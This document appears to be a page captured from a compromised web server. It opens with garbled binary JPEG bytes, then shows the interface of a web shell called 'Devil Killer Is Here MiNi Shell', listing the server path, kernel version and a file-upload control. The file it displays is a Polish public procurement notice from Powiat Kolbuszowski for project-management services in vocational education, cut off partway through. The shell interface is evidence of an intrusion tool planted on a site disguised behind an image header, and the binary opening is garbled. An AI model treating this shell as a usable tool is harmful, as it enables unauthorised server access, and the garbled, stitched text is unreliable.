JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20211007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20211007/0022439901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Zarządzanie projektem: Powiat Kolbuszowski stawia na kształcenie zawodowe” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kolbuszowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581382</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolbuszowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 2275880</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">17 2272523</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kolbuszowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat.kolbuszowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zarządzanie projektem: Powiat Kolbuszowski stawia na kształcenie zawodowe” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1c3c16f2-275b-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00224399</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003416/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 ZARZĄDZANIE PROJEKTEM: POWIAT KOLBUSZOWSKI STAWIA NA KSZTAŁCENIE ZAWODOWE</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Europejski Fundusz Społeczny w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014 –2020, Oś priorytetowa: IX Jakość edukacji i kompetencji w regionie, Działanie: 9.4 Poprawa jakości kształcenia zawodowego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu dostępnego pod adresem<br/>https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem https://epuap.gov.pl/wps/portal oraz<br/>poczty elektronicznej: przetargi @kolbuszowski.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu dostęnego pod adresem https://miniportal.uzp.gov.pl/, ePUAPu dostępnego<br/>pod adresem https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: przetargi @kolbuszowski.pl z<br/>zastrzeżeniem, iż oferta Wykonawcy wraz z załącznikami przekazywana jest tylko przy użyciu ePUAPu<br/>za pośrednictwem dedykowanego “Formularza do złożenia, zmiany, wycofania oferty lub wniosku.”1)<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>“Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do “Formularza do komunikacji.”2)<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Regulaminie w Warunkach<br/>korzystaniaz elektronicznej platformy usług administracji publicznej ePUAP:<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi<br/>https://miniportal.uzp.gov.pl/InstrukcjaUzytkownikaSystemuMiniPortalePUAP.pdf<br/>https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin Wykonawca zainteresowany złożeniem oferty<br/>winien zapoznać się z aktualnymi wytycznymi technicznymi zawartymi w ww. regulaminach.<br/>Wykonawca składający ofertę akceptuje instrukcje użytkownika, regulamin systemu miniPortal i<br/>warunki korzystania ePUAP I uznaje je za wiażące.3) Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy. “Formularz złożenia, zmiany, wycofania oferty lub wniosku”<br/>do “Formularza do komunikacji” wynosi 150 MB.4) Za datę przekazania oferty, wniosków zawiadomień<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. 5) Przesyłanie<br/>danych odbywa w formatach wskazanych w załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia<br/>12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych,6) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy<br/>Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż oferta<br/>Wykonawcy i załączniki do ofert) oraz przekazywanie informacji odbywa się elektronicznie: a) za<br/>pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal (Formularz do komunikacji). We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się nr ogłoszenia BZP lub ID postępowania, lub<br/>b) za pośrednictwem poczty elektronicznej e-mail pod adresem przetargi@kolbuszowski.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Rozdział XXIV SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Rozdział XXIV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.272.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia:<br/>W projekcie udział biorą: <br/>a)	Zasadnicze Szkoły Zawodowe i Technika wchodzące w skład Zespołu Szkół Agrotechniczno-Ekonomicznych w Weryni oraz Zespołu Szkół Technicznych w Kolbuszowej oraz Uczniowie/Uczennice kształcące się na wszystkich kierunków zawodowych w tych szkołach<br/>b)	Nauczycieli/Nauczycielki zatrudnieni w tych szkołach<br/>W ramach projektu realizowane będzie: <br/>-	Doposażenie szkół w sprzęt niezbędny do realizacji kształcenia zawodowego na wybranych kierunkach; <br/>-	Rozwój współpracy szkół z otoczeniem społeczno-gospodarczym;<br/>-	Szkolenia i staże zawodowe dla uczniów; <br/>-	Studia podyplomowe oraz doskonalenie kompetencji zawodowych dla nauczyciel;<br/><br/>Zakres interwencji: Lepsze dopasowywanie systemów kształcenia i szkolenia do potrzeb rynku pracy, ułatwianie przechodzenia z etapu kształcenia do etapu zatrudnienia oraz wzmacnianie systemów kształcenia i szkolenia zawodowego i ich jakości, w tym poprzez mechanizmy prognozowania umiejętności, dostosowania programów nauczania oraz tworzenia i rozwoju systemów uczenia się poprzez praktyczną naukę zawodu realizowaną w ścisłej współpracy z pracodawcami<br/>W ramach usługi zarządzania projektem wymaga się dysponowania min. 3 osobami, które będą pełnić funkcje wymiecione poniżej. Funkcji wymienionych poniżej nie można łączyć – do każdej z funkcji musi zostać wyznaczona min. 1 odrębna osoba: <br/>Zadania w projekcie powinny być realizowane z uwzględnieniem równości płci, równego dostępu dla osób niepełnosprawnych i z uwzględnieniem zasad zrównoważonego rozwoju. <br/>3.1.	Zadanie 1: Kierownik projektu (min. 1 osoba) <br/>3.2	zadanie 2 Koordynator/szkolny opiekun projektu (KSO) w Zespole Szkół Technicznych w Kolbuszowej, ul. Janka Bytnara 2 (min 1 osoba)<br/>3.3	zadanie 3 Koordynator/szkolny opiekun projektu (KSO) w Zespole Szkół Agrotechniczno-Ekonomicznych w Weryni (min. 1 osoba) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79421000-1 - Usługi zarządzania projektem inne niż w zakresie robot budowlanych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1 Kryteria oceny i wyboru ofert i ich znaczenie:<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu.<br/>1).	Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>a)	„Łączna cena ofertowa brutto” – C;<br/>b)	„Doświadczenie Kierownika projektu” – KP.<br/>2).	Powyższym kryteriom Zamawiający przypisał następujące znaczenie:<br/><br/>Kryterium	Łączna cena ofertowa brutto (C)	Waga [%]	60%	Max liczba punktów	60 Sposób oceny wg wzoru<br/> Cena najtańszej oferty<br/>C = ----------------------------------------- x 60pkt<br/> Cena badanej oferty<br/>Doświadczenie Kierownika projektu (KP)	waga 40%	max. ilość punktów 40	Zarządzanie/koordynacja jako kierownik projektu, projektami, w których uczestnikami było min. 40 osób (w każdym projekcie) trwających (każdy z osobna) przez ciągły okres co najmniej 12 miesięcy:<br/>1). zarzadzanie 2 projektami – 0 pkt<br/>2) zarządzanie 4 projektami – 20 pkt<br/>3) zarządzanie 6 projektami i wiecej-40 pkt<br/><br/><br/><br/><br/>3).	Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli powyżej.<br/>4).	W kryterium „Doświadczenie Kierownika projektu” ocenie podlegać będzie liczba projektów, wyliczana na podstawie oświadczenia wykonawcy złożonego w formularzu. w których uczestnikami było min. 40 osób (w każdym projekcie) trwających (każdy z osobna) przez ciągły okres co najmniej 12 miesięcy. którymi zarządzała/koordynowała jako kierownik projektu osoba wskazana przez Wykonawcę w ofercie. Wymagane minimum od Kierownika projektu zgodnie z zapisami rozdziału to zarządzanie min. 2 w/w projektami. Wskazanie większej liczby projektów niż 6 nie spowoduje zwiększenia punktacji.<br/>5).	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + KP<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna cena ofertowa brutto”,<br/>KP – punkty uzyskane w kryterium „Doświadczenie Kierownika projektu”. <br/>6).	Maksymalna łączna liczba punktów do uzyskania przez Wykonawcę wynosi 100,00. Punktacja będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>2.	Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego Zamawiającego, zgodnie z przepisami o podatku od towarów i usług, w zakresie dotyczącym wewnątrz wspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi przepisami.<br/>3.	Badana oferta otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów (zgodnie z zasadą, iż jeżeli trzecia cyfra po przecinku jest równa 5 lub więcej to zaokrąglenie następuje „w górę”, jeżeli trzecia cyfra po przecinku jest mniejsza niż 5 to zaokrąglenie następuje „w dół”).<br/>4.	Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną jako sumą punktów uzyskanych w ww. kryteriach.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie PZP, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kierownika projektu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	Zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie wskazuje żadnego warunku w tym zakresie. <br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie wskazuje żadnego warunku w tym zakresie. <br/>3)	Sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie wskazuje żadnego warunku w tym zakresie. <br/>4)	Zdolności technicznej lub zawodowej: <br/>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie i uzna, że warunek ten zostanie spełniony, jeżeli: <br/><br/>a)	Wykonawcy muszą wykazać, że wykonali, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie– co najmniej 1 usługę, która polegała na zarządzaniu projektem edukacyjnym w którym uczestniczyło min. 80 osób, trwający przez ciągły okres co najmniej 18 miesięcy dofinansowanym ze środków pochodzących ze zorganizowanego programu<br/>b)	dysponuje kadrą techniczną posiadającą uprawnienia i kwalifikacje tj: <br/>Wykonawca dysponuje lub będzie dysponować na etapie realizacji zamówienia osobami, zdolnymi do wykonania zamówienia o kwalifikacjach zawodowych, uprawnieniach, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia, odpowiadającym warunkom określonym poniższej:<br/><br/>I. Kierownik Projektu 1. wykształcenie wyższe <br/>2. co najmniej 4 letnie doświadczenie w realizacji projektów dofinansowanym ze środków pochodzących ze zorganizowanego programu <br/>3. zarządzanie/koordynacja jako kierownik projektu min. 2 projektami, dofinansowanym ze środków pochodzących ze zorganizowanego programu, w których uczestnikami było min. 40 osób (w każdym projekcie) trwających (każdy z osobna) przez ciągły okres co najmniej 12 miesięcy	<br/><br/>II Koordynator/szkolny opiekun projektu (KSO) w Zespole Szkół Technicznych w Kolbuszowej	1. wykształcenie wyższe <br/>2. co najmniej 3 letnie doświadczenie w obsłudze administracyjno-finansowej projektów dofinansowanych ze środków pochodzących ze zorganizowanego programu <br/>3. udział w realizacji min. 2 projektów, w których uczestnikami było min. 40 osób (w każdym projekcie) trwających przez ciągły okres co najmniej 12 miesięcy	<br/><br/>III Koordynator/szkolny opiekun projektu (KSO) w Zespole Szkół Agrotechniczno-Ekonomicznych w Weryni	1. wykształcenie wyższe <br/>2. co najmniej 3 letnie doświadczenie w obsłudze administracyjno-finansowej projektów dofinansowanym ze środków pochodzących ze zorganizowanego programu <br/>3. udział w realizacji min. 2 projektów, w których uczestnikami było min. 40 osób (w każdym projekcie) trwających przez ciągły okres co najmniej 12 miesięcy 1<br/>Zamawiający zastrzega, że jedna (ta sama) osoba, może być wykazywana w celu spełniania wymagań w nie więcej niż jednej roli.<br/>3. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły “spełnia - nie spełnia” w oparciu o informacje zawarte w oświadczeniach i dokumentach złożonych przez Wykonawcę <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 - <br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców np. spółka cywilna, konsorcjum) oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Podmiotowe środki dowodowe wymagane od wykonawcy obejmują również:<br/>1)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>4)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w ust. 5 pkt 1, składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, <br/> jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>5)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w ust. 5 pkt 1, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszka nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.<br/>Dokumenty, o których mowa wyżej powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 - <br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców np. spółka cywilna, konsorcjum) oświadczenie składa każdy z wykonawców wspólnie 